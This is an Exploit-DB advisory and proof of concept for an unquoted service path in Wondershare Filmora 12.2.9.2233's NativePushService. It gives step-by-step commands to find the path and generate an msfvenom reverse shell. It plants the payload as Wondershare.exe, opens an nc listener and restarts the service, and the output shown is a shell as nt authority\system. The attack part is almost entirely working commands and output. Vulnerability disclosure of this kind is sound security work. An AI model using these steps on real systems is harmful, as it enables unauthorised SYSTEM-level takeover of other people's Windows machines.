Wondershare Filmora 12.2.9.2233 - Unquoted Service Path

EDB-ID:

51395

CVE:

N/A


Author:

msd0pe

Type:

local


Platform:

Windows

Date:

2023-04-25


############################################################################
#                                                                          #
#  Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path  #
#  Date: 2023/04/23                                                        #
#  Exploit Author: msd0pe                                                  #
#  Vendor Homepage: https://www.wondershare.com                            #
#  My Github: https://github.com/msd0pe-1                                  # 
#                                                                          # 
############################################################################

Wondershare Filmora:
Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.

[1] Find the unquoted service path:
    > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Native Push Service   NativePushService   C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe   Auto

[2] Get informations about the service:
    > sc qc "NativePushService"

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: NativePushService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Wondershare Native Push Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem


[3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe

[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe
    > put Wondershare.exe
    > ls
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 .
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 ..
    drw-rw-rw-          0  Sun Apr 23 14:36:26 2023 Wondershare Filmora Update
    drw-rw-rw-          0  Sun Apr 23 14:37:13 2023 Wondershare NativePush
    -rw-rw-rw-       7168  Sun Apr 23 14:51:47 2023 Wondershare.exe
    drw-rw-rw-          0  Sun Apr 23 13:52:30 2023 WSHelper


[5] Start listener
    > nc -lvp 4444

[6] Reboot the service/server
    > sc stop "NativePushService"
    > sc start "NativePushService"

    OR

    > shutdown /r

[7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system